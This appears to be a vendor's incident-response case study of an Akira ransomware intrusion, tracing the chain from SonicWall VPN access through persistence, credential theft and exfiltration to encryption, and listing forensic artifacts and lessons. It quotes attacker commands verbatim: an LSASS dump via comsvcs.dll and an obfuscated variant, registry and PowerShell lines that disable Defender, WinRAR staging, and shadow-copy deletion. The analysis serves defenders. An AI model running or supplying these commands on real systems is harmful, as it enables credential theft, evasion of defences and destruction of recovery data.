The Situation
The encryption was discovered at 06:47 on a Monday morning. A manufacturing company with 200 employees and three production facilities found their file servers locked, each bearing the .akira extension. The ransom note, akira_readme.txt, referenced the group's Tor leak site and demanded $2.1 million in Bitcoin.
The DFIR consultancy was engaged within the hour. Akira had become one of the most prolific ransomware operations of 2025, generating over $42 million in ransom proceeds and compromising more than 350 organisations globally. This was not an unusual case for the group, but the pressure on the consultancy was significant.
Initial triage confirmed Akira deployment via Group Policy Object. But the questions that mattered remained open. How did they get in? Which accounts were compromised? What persistence mechanisms had they established? Production downtime was costing the client £40,000 per day, and cyber insurance required preliminary findings within 48 hours.
The Challenge
Imaging domain controllers and parsing terabytes of Windows Event Logs would take the consultancy three to five days. That timeline assumed experienced analysts working full-time on a single engagement.
Arctic Wolf had documented over 30 Akira intrusions since August 2024 involving SonicWall SSL VPNs. The pattern was consistent: compromised local accounts, disabled MFA, attacks completing in under four hours. The threat intelligence suggested this case would follow the same template.
The client needed answers quickly. Until the entry point was identified and persistence mechanisms removed, the organisation could not safely bring systems back online. Remediation without root cause analysis risked immediate reinfection.
The Investigation
Strand's collection agent was deployed to the domain controller and four suspected hosts within 15 minutes. The forensic analysis that followed would typically require days of manual work. Within 30 minutes, Strand had identified root cause and mapped the complete attack chain.
Initial Access: SonicWall SSL VPN Exploitation
The entry point was the organisation's SonicWall Gen 6 SSL VPN appliance running firmware version 6.5.4.14-109n. VPN authentication logs showed a successful login at 02:14 using the service account svc_backup, which had been dormant for 14 months. MFA was not enabled on this account.
The attack leveraged CVE-2024-40766, a critical improper access control vulnerability in SonicWall SonicOS rated CVSS 9.3. CISA added this to the Known Exploited Vulnerabilities catalog on September 9, 2024. The account was a local SonicWall account not integrated with Active Directory. Credentials were likely purchased from an initial access broker, as the organisation had no evidence of credential phishing.
Persistence Mechanism #1: Cloudflared Tunnel
Seventeen minutes after initial access, at 02:31, the threat actor established a Cloudflared tunnel. This technique is standard for Akira operations because tunnel traffic appears as legitimate Cloudflare HTTPS connections and evades most network monitoring solutions.
Strand identified a scheduled task named "CloudflareUpdate" in C:\Windows\System32\Tasks\ configured to execute cloudflared.exe from C:\ProgramData\ with a Base64-encoded tunnel token. The token structure contained the Cloudflare account ID, tunnel UUID, and tunnel secret. Command line: cloudflared.exe tunnel --config C:\ProgramData\config.yml run --token [BASE64_TOKEN]. The task was set to run at system startup and trigger on network connection.
Persistence Mechanism #2: AnyDesk Remote Access
A secondary persistence mechanism was AnyDesk, a legitimate remote management tool observed in over 43% of Akira incidents. The threat actor installed AnyDesk silently with unattended access configured, providing a backup access method independent of the Cloudflared tunnel.
AnyDesk was installed to C:\ProgramData\AnyDesk\ with configuration enabling unattended access. Registry analysis at HKCU\Software\AnyDesk revealed the remote connection ID had been accessed from an IP address in Eastern Europe. Sophos detection signature: ATK/AnyDesk-A (when deployed maliciously).
Credential Harvesting: LSASS Memory Dump
At 03:12, the threat actor harvested credentials from the domain controller using the comsvcs.dll MiniDump method. This technique avoids dropping known tools like Mimikatz and is detected by Sophos as WIN-CRD-PRC-RUNDLL-COMSVCS-LSASS-1.
Windows Security Event Log analysis (Event ID 4688) revealed execution of: rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 572 C:\ProgramData\lsass.dmp full. An obfuscated variant was also attempted: rundll32.exe comsvcs.dll, #+0000^24 [PID] C:\ProgramData\output.docx full. The dump files were deleted but recovered from $MFT entries.
Defence Evasion: EDR Disabling via BYOVD
Before lateral movement, the threat actor disabled Windows Defender and attempted to terminate the EDR agent using a Bring Your Own Vulnerable Driver (BYOVD) attack. They deployed PowerTool with the legitimate signed Zemana AntiMalware kernel driver (zamguard64.sys) to terminate security processes at the kernel level.
Registry modification: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f. PowerShell: Set-MpPreference -DisableRealtimeMonitoring $true. The Zemana driver (CVE-2024-1853) provided raw SCSI disk access and process termination capabilities to kill EDR processes.
Data Exfiltration via RClone
Prior to encryption, approximately 290GB of data was exfiltrated using RClone, which is used in 57% of ransomware exfiltration incidents. Data was transferred to an attacker-controlled MEGA account over a two-hour window.
RClone was deployed to C:\Windows\svchost.exe (renamed to evade detection). Configuration file at C:\Windows\rclone.conf referenced MEGA cloud storage. Sophos detection: EQL-WIN-EXF-PRC-SUSP-RCLONE-OPTION-1. Exfiltration was staged using WinRAR: WinRAR.exe a -ep1 -scul -r0 -iext [archive] [target_folders].
Ransomware Deployment via GPO
At 06:15, the Akira encryptor (w.exe) was deployed via Group Policy Object. 65 systems were encrypted within 32 minutes: the VMware ESXi hypervisors, all production virtual machines, and a handful of employee endpoints that had been left powered on overnight. Volume Shadow Copies were deleted and Windows event logs were cleared.
The encryptor was staged in \\domain\SYSVOL\domain\scripts\w.exe. GPO created two scheduled tasks: first to terminate processes via taskkill.exe, second to execute the encryptor. The overnight timing meant most employee workstations were offline, limiting endpoint impact. Hypervisors and VMs bore the brunt of the attack. Shadow copy deletion: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}. Security log cleared (Event ID 1102) at 06:47. Encryption used ChaCha8 + KCipher2 hybrid scheme with RSA-4096 for key protection.
Attack Timeline
Credentials listed on access broker marketplace
- ›Service account svc_backup credentials for sale
- ›Likely harvested from infostealer malware on employee device
Initial access broker listing
VPN authentication
- ›Successful login via SonicWall SSL VPN
- ›No MFA on legacy service account
CVE-2024-40766 exploitation
Cloudflared tunnel established
- ›Persistent C2 channel configured
- ›Scheduled task for persistence
C:\ProgramData\cloudflared.exe
AnyDesk deployed
- ›Secondary remote access established
- ›Unattended access configured
C:\ProgramData\AnyDesk\
Credential harvesting
- ›LSASS memory dump via comsvcs.dll
- ›Domain Admin credentials obtained
Event ID 4688: rundll32.exe comsvcs.dll MiniDump
EDR disabled
- ›Windows Defender disabled via registry and PowerShell
- ›BYOVD attack with Zemana driver
zamguard64.sys kernel driver
Data exfiltration
- ›290GB staged with WinRAR
- ›Exfiltrated via RClone to MEGA
C:\Windows\svchost.exe (renamed rclone)
Ransomware deployment
- ›Akira encryptor w.exe via GPO
- ›65 systems encrypted (hypervisors, VMs, few endpoints)
ChaCha8 + KCipher2 + RSA-4096
Key Forensic Artifacts
- •Scheduled Task: C:\Windows\System32\Tasks\CloudflareUpdate
- •Registry: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = 1
- •Executable: C:\ProgramData\cloudflared.exe with tunnel token
- •RClone: C:\Windows\svchost.exe (renamed), config at C:\Windows\rclone.conf
- •LSASS Dump: C:\ProgramData\lsass.dmp (deleted, recovered from $MFT)
- •Zemana Driver: zamguard64.sys loaded for BYOVD attack
- •Ransom Note: akira_readme.txt in each encrypted directory
- •Event IDs: 4624, 4648, 4688, 4720 (account creation), 1102 (log cleared)
Key Takeaways
- 1SonicWall SSL VPN accounts must have MFA enabled, especially local accounts not integrated with Active Directory. CVE-2024-40766 exploitation requires only valid credentials when MFA is disabled.
- 2Cloudflared tunnels and legitimate RMM tools like AnyDesk are standard Akira persistence mechanisms. Monitor for installation of remote access tools and unusual scheduled tasks.
- 3The comsvcs.dll MiniDump technique and BYOVD attacks can disable EDR solutions. Behavioural monitoring for LSASS access and kernel driver loading is essential.
- 4RClone exfiltration to MEGA is the most common data theft method. Application whitelisting should not automatically trust renamed executables.
- 5Akira affiliates complete attacks in under four hours. Detection and response capabilities must match this operational tempo.